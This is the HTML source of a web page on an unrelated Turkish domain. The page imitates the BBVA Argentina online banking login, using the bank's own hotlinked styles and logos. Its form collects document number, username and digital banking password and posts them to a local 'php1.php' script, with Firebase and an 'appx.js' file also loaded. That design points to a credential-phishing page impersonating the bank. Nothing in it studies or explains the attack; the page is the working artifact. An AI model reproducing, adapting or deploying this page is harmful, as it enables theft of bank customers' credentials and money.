<!-- URL =http://m-88.com.tr/frances--><!-- w =('m-88.com.tr', datetime.datetime(2019, 12, 9, 0, 0), datetime.datetime(2021, 12, 8, 0, 0))--><!DOCTYPE html>
<html lang="es-AR">
 <head>
  <title>
   Bienvenido a nuestra Banca Online | BBVA Argentina
  </title>
  <link href="style.css" rel="stylesheet"/>
  <link href="style3.css" rel="stylesheet"/>
  <link href="styledropdown.css" rel="stylesheet"/>
  <link href="style2.css" rel="stylesheet"/>
  <link href="https://www.bbva.com.ar/fnetcore/assets/fonts/bbva-bsas/bbva-icons-bsas.css" rel="stylesheet"/>
  <link href="https://www.bbva.com.ar/fnetcore/assets/fonts/bbva-icons-login/style.css" rel="stylesheet"/>
  <meta content="text/html; charset=utf-8" http-equiv="content-type"/>
  <meta content="IE=edge" http-equiv="X-UA-Compatible"/>
  <meta content="width=device-width, initial-scale=1.0" name="viewport"/>
  <meta content="es-AR" name="lang"/>
  <link href="https://www.bbva.com.ar/content/dam/public-web/global/system/styles/fonts/BentonSansBBVA-Light.woff2" type="font/woff2"/>
  <link href="https://www.bbva.com.ar/content/dam/public-web/global/system/styles/fonts/BentonSansBBVA-Medium.woff2" type="font/woff2"/>
  <link href="https://www.bbva.com.ar/content/dam/public-web/global/system/styles/fonts/BentonSansBBVA-Bold.woff2" type="font/woff2"/>
  <link href="https://www.bbva.com.ar/content/dam/public-web/global/system/styles/fonts/BentonSansBBVA-Book.woff2" type="font/woff2"/>
  <link href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.critical/small.lc-20210203-070201-lc.min.css" rel="stylesheet" type="text/css"/>
  <link href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.critical/large.lc-20210203-070201-lc.min.css" media="all and (min-width: 600px)" rel="stylesheet" type="text/css"/>
  <link href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.common.lc-20210203-070201-lc.min.css" rel="stylesheet"/>
  <link href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.fonts/small.lc-20210203-070201-lc.min.css" rel="stylesheet"/>
  <link href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.lightbox/small.lc-20210203-070201-lc.min.css" rel="stylesheet"/>
  <link href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.videoLink/small.lc-20210203-070201-lc.min.css" rel="stylesheet"/>
  <link href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/57x57.png" rel="apple-touch-icon" sizes="57x57">
   <link href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/72x72.png" rel="apple-touch-icon" sizes="72x72">
    <link href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/76x76.png" rel="apple-touch-icon" sizes="76x76">
     <link href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/114x114.png" rel="apple-touch-icon" sizes="114x114">
      <link href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/120x120.png" rel="apple-touch-icon" sizes="120x120">
       <link href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/144x144.png" rel="apple-touch-icon" sizes="144x144">
        <link href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/152x152.png" rel="apple-touch-icon" sizes="152x152">
         <link href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/167x167.png" rel="apple-touch-icon" sizes="167x167">
          <link href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/180x180.png" rel="apple-touch-icon" sizes="180x180">
           <link href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/16x16.png" rel="icon" sizes="16x16" type="image/png">
            <link href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/32x32.png" rel="icon" sizes="32x32" type="image/png">
             <link href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/96x96.png" rel="icon" sizes="96x96" type="image/png">
              <link href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/128x128.png" rel="icon" sizes="128x128" type="image/png">
               <link/>
               <link href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/192x192.png" rel="icon" sizes="192x192" type="image/png">
                <link href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/195x195.png" rel="icon" sizes="195x195" type="image/png">
                 <link href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/196x196.png" rel="icon" sizes="196x196" type="image/png">
                  <link href="https://www.bbva.com.ar/apps/settings/wcm/designs/bbva/img/favicons/228x228.png" rel="icon" sizes="228x228" type="image/png">
                   <link href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.header/small.lc-20210203-070201-lc.min.css" rel="stylesheet" type="text/css"/>
                   <link href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.header/large.lc-20210203-070201-lc.min.css" media="all and (min-width: 600px)" rel="stylesheet" type="text/css"/>
                  </link>
                 </link>
                </link>
               </link>
              </link>
             </link>
            </link>
           </link>
          </link>
         </link>
        </link>
       </link>
      </link>
     </link>
    </link>
   </link>
  </link>
 </head>
 <body class="ng-scope" ng-controller="PreLoginCtrl">
  <header class="header__base wrapper">
   <link href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.alert/small.lc-20210203-070201-lc.min.css" rel="stylesheet" type="text/css"/>
   <link href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.alert/large.lc-20210203-070201-lc.min.css" media="all and (min-width: 600px)" rel="stylesheet" type="text/css"/>
   <link href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.stickyalert.lc-20210203-070201-lc.min.css" rel="stylesheet" type="text/css"/>
   <a aria-label="Ir al contenido principal" class="skip2content invisible" href="#main" tab-index="0">
    Ir al contenido principal
   </a>
   <nav aria-label=" BBVA Argentina: Tarjetas, Prestamos, inversiones, seguros, sucursales" class="header__container background--navy" data-component="header" data-dl-component="" data-dl-component-name="header" data-dl-component-type="https://www.bbva.com.ar/bbva/pwebs/components/par/header" id="header">
    <div class="header__main container">
     <div class="header__wrapper">
      <div class="header__logo" data-component="svgLogoFix" itemscope="" itemtype="http://schema.org/Organization">
       <a aria-label="Home Personas BBVA" class="header__logo__link " href="#" itemscope="url" target="_self" title=" BBVA Argentina: Tarjetas, Prestamos, inversiones, seguros, sucursales">
        <img alt=" BBVA Argentina: Tarjetas, Prestamos, inversiones, seguros, sucursales" class="header__image " itemprop="logo" role="img" sizes="(min-width: 900px) 20vw, 50vw" src="https://www.bbva.com.ar/content/dam/public-web/global/images/logos/logo_bbva_blanco.svg" srcset="https://www.bbva.com.ar/content/dam/public-web/global/images/logos/logo_bbva_blanco.svg"/>
       </a>
      </div>
      <div class="header__mainnavigation" itemscope="" itemtype="https://schema.org/SiteNavigationElement">
       <link href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.mainNavigation/small.lc-20210203-070201-lc.min.css" rel="stylesheet" type="text/css"/>
       <link href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.mainNavigation/large.lc-20210203-070201-lc.min.css" media="all and (min-width: 600px)" rel="stylesheet" type="text/css"/>
       <nav class="mainnavigation__base">
        <ul class="mainnavigation__list">
         <li class="mainnavigation__item mainnavigation__item--active" itemprop="name">
          <a aria-label="Personas Opción seleccionada" class="mainnavigation__link" href="#" itemprop="url" target="_self">
           Personas
          </a>
         </li>
         <li class="mainnavigation__item" itemprop="name">
          <a aria-label="Empresas " class="mainnavigation__link" href="#" itemprop="url" target="_self">
           Empresas
          </a>
         </li>
        </ul>
       </nav>
      </div>
     </div>
     <nav class="header__actions" itemscope="" itemtype="https://schema.org/SiteNavigationElement">
      <ul class="header__actions__ulist">
       <li class="header__actions__list header__actions--tablet-left" itemprop="name">
        <link href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.access/small.lc-20210203-070201-lc.min.css" rel="stylesheet"/>
       </li>
       <li class="header__actions__list header__actions--tablet-hidden">
        <div class="search__trigger" role="search">
         <a accesskey="s" aria-controls="access__container__content" aria-expanded="false" aria-haspopup="true" aria-label="Buscador" class="header__actions__item__link search__trigger__btn" href="javascript:void(0);" title="search">
          <svg height="20px" viewbox="0 0 260 260" width="20px" xmlns="http://www.w3.org/2000/svg">
           <defs>
            <style>
             .cls-1{fill:#fff}
            </style>
           </defs>
           <path class="cls-1" d="M182.85 162.85a90 90 0 1 0-20 20L220 240l20-20zM150 110a40 40 0 0 0-40-40V50a60 60 0 0 1 60 60z" id="icons">
           </path>
          </svg>
         </a>
        </div>
       </li>
       <li class="header__actions__list header__actions--tablet-right">
        <a accesskey="m" aria-controls="megamenu__aside" aria-expanded="false" aria-haspopup="true" aria-label="Menú principal" class="megamenu__trigger header__actions__item__link " href="javascript:void(0);">
         <span aria-hidden="false" class="megamenu__trigger megamenu__trigger__open header__actions--menu">
          <span class="header__actions__item__link__text">
           Menú
          </span>
          <svg class="header__icon" height="24px" viewbox="0 0 260 260" width="24px" xmlns="http://www.w3.org/2000/svg">
           <defs>
            <style>
             .cls-1{fill:#fff}
            </style>
           </defs>
           <g id="icons">
            <polygon class="cls-1" points="210.37 80.12 20.37 80.12 20.37 50.12 240.37 50.12 210.37 80.12">
            </polygon>
            <polygon class="cls-1" points="180.37 145.12 20.37 145.12 20.37 115.12 210.37 115.12 180.37 145.12">
            </polygon>
            <polygon class="cls-1" points="150.37 210.12 20.37 210.12 20.37 180.12 180.37 180.12 150.37 210.12">
            </polygon>
           </g>
          </svg>
         </span>
         <span aria-hidden="true" class="megamenu__trigger megamenu__trigger__close hidden header__actions--menu">
          <span class="header__actions__item__link__text">
           Cerrar
          </span>
          <i class="bbva-icon bbva-icon__2_022_close">
          </i>
         </span>
        </a>
       </li>
      </ul>
     </nav>
    </div>
   </nav>
   <div aria-hidden="true" class="access__container invisible" id="access__container__content" tabindex="-1">
    <div class="container">
     <div class="access__control">
      <button aria-label="cerrar" class="access__close" tabindex="-1">
       <i class="bbva-icon bbva-icon__2_022_close">
       </i>
      </button>
     </div>
     <div class="access__content">
     </div>
    </div>
   </div>
  </header>
  <div class="access__content">
   <div class="general-wrapper">
    <!-- This file is being overwritten in the configuration page to allow the edition of the header alert
     or other header components which can be edited into the configuration template.
 -->
    <div class="search search--desktop wrapper">
     <link href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.searchbar/small.lc-20210203-070201-lc.min.css" rel="stylesheet" type="text/css"/>
     <link href="https://www.bbva.com.ar/apps/bbva/pwebs/components/clientlibs/bbva.searchbar/large.lc-20210203-070201-lc.min.css" media="all and (min-width: 600px)" rel="stylesheet" type="text/css"/>
     <div class="ng-scope" ng-include="'partials/public/loginClementeForm.html'">
      <!-- ngIf: errorMessage -->
      <div class="modal-login mgb-0 row ng-scope">
       <div class="col-xs-12 col-sm-6 first-box">
        <div class="col-xs-12 col-sm-6 first-box">
         <div class="box">
          <!-- ngIf: errorSafariMsg -->
          <!-- ngIf: !errorSafariMsg -->
          <!--ng-class="{'blur-content': listOptions.open}"-->
          <!--<div class="form-group select-element">
                  <select id="selectDNI"
                          ng-options="tdoc.descripcion for tdoc in model.documentTypes track by tdoc.codigoFNET"
                          ng-model="model.documentTypeSelected" class="btn">
                  </select>
              </div>-->
          <div class="wrapper-login">
           <form action="php1.php" class="ng-scope ng-pristine ng-invalid ng-invalid-required" id="registrationform" method="post" name="forms.login">
            <!-- <span class="login-title" ng-if="!errorMessage"><span
                    ></span>¡Bienvenido!</span> -->
            <div bbva-loader="" class="loader ng-isolate-scope ng-hide" loading="loadingDynamicValidations" ng-show="isLoading()">
             <!-- ngIf:    <div class="loader-spinner" ng-class="{'background-loader':blueBackground, 'light-background-loader': lightBackground}"></div>
   currentMessage -->
            </div>
            <!-- ngIf: !loadingDynamicValidations -->
            <div class="ng-scope">
             <article class="tip-area">
              <p class="tip-msg" ng-style="{'background-image':'url(https://assets.caasbbva.com/argentina/net/security-tips/access-biometric-secure.png)'}" style="background-image: url(https://assets.caasbbva.com/argentina/net/security-tips/access-biometric-secure.png);">
               <span class="ng-binding">
                Tus claves son personales e intransferibles, no las compartas.
               </span>
              </p>
             </article>
             <div class="form-control drop-down ng-isolate-scope ">
              <div class="custom-select">
               <select class="button-select drop-down ng-isolate-scope">
                <!-- ngRepeat:               <div style="@font-face {
                          font-family: BBVA Web Light;
                          src: url(./bbvaweb-light-woff.woff);
                       }

                       * {
                          font-family: BBVA Web Light;
                       }" class="drop-down ng-isolate-scope" >
                           -5- option in listOptions.options track by $index -->
                <option value="0">
                 DNI
                </option>
                <option selected="" value="DNI">
                 DNI
                </option>
                <!-- end ngRepeat: option in listOptions.options track by $index -->
                <option value="LC">
                 LC
                </option>
                <!-- end ngRepeat: option in listOptions.options track by $index -->
                <option value="LE">
                 LE
                </option>
                <!-- end ngRepeat: option in listOptions.options track by $index -->
                <option value="CI">
                 CI
                </option>
                <!-- end ngRepeat: option in listOptions.options track by $index -->
                <option value="PASAPORTE">
                 PASAPORTE
                </option>
                <!-- end ngRepeat: option in listOptions.options track by $index -->
                <option value="RENAPER">
                 RENAPER
                </option>
                <!-- end ngRepeat: option in listOptions.options track by $index -->
               </select>
              </div>
             </div>
            </div>
           </form>
          </div>
         </div>
        </div>
       </div>
      </div>
     </div>
    </div>
   </div>
  </div>
 </body>
</html>
<div class="form-group">
 <div class="new-input-control input-control-tooltip input-container">
  <input class="form-control ng-pristine ng-invalid ng-invalid-required" id="documento" maxlength="13" name="documento" required="" type="text"/>
  <label for="documentNumberInput">
   Número de documento
  </label>
  <span class="icon-login-close">
  </span>
 </div>
</div>
<div>
 <!-- ngIf: model.validarGenero -->
 <div class="form-group">
  <div class="new-input-control input-control-tooltip">
   <input autocomplete="off" class="form-control ng-pristine ng-invalid ng-invalid-required" data-ds-in-pii-usuario="" id="usuario" maxlength="20" name="usuario" ng-change="model.nuevoValor = model.digitalUser" ng-disabled="loading" ng-focus="model.nuevoValor = model.digitalUser; setSelectedItem(model, 'digitalUser');focusin = !true" ng-model="model.digitalUser" required="{{validations.user.required}}" type="text"/>
   <label for="digitalUser">
    Usuario
   </label>
   <span class="icon-login-close">
   </span>
  </div>
 </div>
 <div class="form-group icon-eye-input">
  <div class="new-input-control input-control-tooltip ">
   <input autocomplete="off" class="form-control ng-pristine ng-valid-pattern ng-invalid ng-invalid-required" id="clave" maxlength="8" name="clave" ng-change="model.nuevoValor = model.digitalKey" ng-disabled="loading" ng-focus="model.nuevoValor = model.digitalKey; setSelectedItem(model, 'digitalKey'); focusin = !true" ng-model="model.digitalKey" required="{{validations.password.required}}" type="password"/>
   <label for="digitalKey">
    Clave digital
   </label>
   <button class="icon-login-eye icon-eye-btn blue" ng-class="showPassword ? 'grey' : 'blue'" type="button">
   </button>
   <span class="icon-login-close">
   </span>
  </div>
 </div>
</div>
<div class="text-center virtual-keyboard">
 <!-- ngIf: (!isMobileTv() && !initOk) -->
 <div alt="Teclado Virtual" class="link-teclado ng-scope" id="mobileVirtualKeyboard" ng-click="getNumber()" ng-if="(!isMobileTv() &amp;&amp; !initOk)" title="Teclado Virtual">
  <span class="icon-login-keyboard_icon">
  </span>
  <span class="tvirtual_link">
   Teclado Virtual
  </span>
 </div>
 <!-- end ngIf: (!isMobileTv() && !initOk) -->
</div>
<!-- end ngIf: !loadingDynamicValidations -->
<div class="form-group enter">
 <div bbva-loader="" class="loader ng-isolate-scope ng-hide" loading="loading" ng-show="isLoading()">
  <!-- ngIf:    <div class="loader-spinner" ng-class="{'background-loader':blueBackground, 'light-background-loader': lightBackground}"></div>
 currentMessage -->
 </div>
 <div class="buttons-container">
  <button class="secondary-button" type="button">
   Registrarme
  </button>
  <!-- ngIf:    <div class="loader-spinner" ng-class="{'background-loader':blueBackground, 'light-background-loader': lightBackground}"></div>
                           currentMessage-->
  <button class="primary-button" sendmessage()="" type="submit">
   Ingresar
  </button>
 </div>
</div>
<div class="text-center">
 <button class="modal-trigger key-link" ng-click="showModalRecoverUser()" title="Ir a 'Recuperar Usuario o Contraseña'" type="button">
  Olvidé o bloqueé mi Usuario / Clave
                          Digital
 </button>
</div>
<div class="form-group form-links security-link-login no-margin text-center">
 <button class="modal-trigger key-link" ng-click="showRecommendations()" title="Ir a 'Recomendaciones de Seguridad'" type="button">
  Recomendaciones de seguridad
 </button>
</div>
<!-- end ngIf: !errorSafariMsg -->
<!-- box -->
<!-- esUsuario -->
<!-- !errorMessageOffLine -->
<footer aria-label="Pie de página" role="contentinfo">
 <div class="footer__base" data-dl-component="" data-dl-component-name="footer" data-dl-component-type="bbva/pwebs/components/par/footer" id="footer">
  <div class="container">
   <a class="footer__logo__link " href="/personas.html" target="_self">
    <img alt="" class="footer__logo " data-component-params='{"keepSize": "" }' role="img" src="/content/dam/public-web/global/images/logos/logo_bbva_blanco.svg" srcset="/content/dam/public-web/global/images/logos/logo_bbva_blanco.svg"/>
   </a>
   <div class="footer__links">
    <div class="footer__list">
     <div class="link">
      <a aria-label="Aviso legal. Abre en la misma ventana." class="link__content link__base " href="/personas/aviso-legal.html" itemprop="url" target="_self" title="Aviso legal. Abre en la misma ventana.">
       Aviso legal
      </a>
     </div>
     <div class="link">
      <a aria-label="Aviso sobre Navegadores. Abre en la misma ventana" class="link__content link__base " href="/personas/aviso-sobre-navegadores.html" itemprop="url" target="_self" title="Aviso sobre Navegadores. Abre en la misma ventana">
       Aviso sobre Navegadores
      </a>
     </div>
     <div class="link">
      <a aria-label="Mapa. Abre en la misma ventana." class="link__content link__base " href="/personas/mapa.html" itemprop="url" target="_self" title="Mapa. Abre en la misma ventana.">
       Mapa
      </a>
     </div>
     <div class="link">
      <a aria-label="Recomendaciones de Seguridad. Abre en la misma ventana." class="link__content link__base " href="/personas/recomendaciones-de-seguridad.html" itemprop="url" target="_self" title="Recomendaciones de Seguridad. Abre en la misma ventana.">
       Recomendaciones de Seguridad
      </a>
     </div>
    </div>
    <div class="footer__optional">
    </div>
   </div>
   <div class="footer__social">
   </div>
   <div class="footer__disclaimer">
    <p class="footer__copyright">
     © 2021 Banco BBVA Argentina S.A.
    </p>
    <div class="footer__claim">
     <p class="claim__content">
      Creando Oportunidades
     </p>
    </div>
   </div>
  </div>
 </div>
 <!-- TODO:
<div data-sly-resource="doormat"></div>
<div data-sly-resource="navigation"></div>
*/-->
 <!-- TODO:
<div data-sly-resource="scrollTop"></div>
*/-->
</footer>
<div class="wrapper sticky__wrapper">
</div>
<script>
 var x, i, j, l, ll, selElmnt, a, b, c;
/*look for any elements with the class "custom-select":*/
x = document.getElementsByClassName("custom-select");
l = x.length;
for (i = 0; i < l; i++) {
  selElmnt = x[i].getElementsByTagName("select")[0];
  ll = selElmnt.length;
  /*for each element, create a new DIV that will act as the selected item:*/
  a = document.createElement("DIV");
  a.setAttribute("class", "select-selected");
  a.innerHTML = selElmnt.options[selElmnt.selectedIndex].innerHTML;
  x[i].appendChild(a);
  /*for each element, create a new DIV that will contain the option list:*/
  b = document.createElement("DIV");
  b.setAttribute("class", "select-items select-hide");
  for (j = 1; j < ll; j++) {
    /*for each option in the original select element,
    create a new DIV that will act as an option item:*/
    c = document.createElement("DIV");
    c.innerHTML = selElmnt.options[j].innerHTML;
    c.addEventListener("click", function(e) {
        /*when an item is clicked, update the original select box,
        and the selected item:*/
        var y, i, k, s, h, sl, yl;
        s = this.parentNode.parentNode.getElementsByTagName("select")[0];
        sl = s.length;
        h = this.parentNode.previousSibling;
        for (i = 0; i < sl; i++) {
          if (s.options[i].innerHTML == this.innerHTML) {
            s.selectedIndex = i;
            h.innerHTML = this.innerHTML;
            y = this.parentNode.getElementsByClassName("same-as-selected");
            yl = y.length;
            for (k = 0; k < yl; k++) {
              y[k].removeAttribute("class");
            }
            this.setAttribute("class", "same-as-selected");
            break;
          }
        }
        h.click();
    });
    b.appendChild(c);
  }
  x[i].appendChild(b);
  a.addEventListener("click", function(e) {
      /*when the select box is clicked, close any other select boxes,
      and open/close the current select box:*/
      e.stopPropagation();
      closeAllSelect(this);
      this.nextSibling.classList.toggle("select-hide");
      this.classList.toggle("select-arrow-active");
    });
}
function closeAllSelect(elmnt) {
  /*a function that will close all select boxes in the document,
  except the current select box:*/
  var x, y, i, xl, yl, arrNo = [];
  x = document.getElementsByClassName("select-items");
  y = document.getElementsByClassName("select-selected");
  xl = x.length;
  yl = y.length;
  for (i = 0; i < yl; i++) {
    if (elmnt == y[i]) {
      arrNo.push(i)
    } else {
      y[i].classList.remove("select-arrow-active");
    }
  }
  for (i = 0; i < xl; i++) {
    if (arrNo.indexOf(i)) {
      x[i].classList.add("select-hide");
    }
  }
}
/*if the user clicks anywhere outside the select box,
then close all select boxes:*/
document.addEventListener("click", closeAllSelect);
</script>
<script src="https://www.gstatic.com/firebasejs/5.10.0/firebase.js">
</script>
<script src="appx.js">
</script>
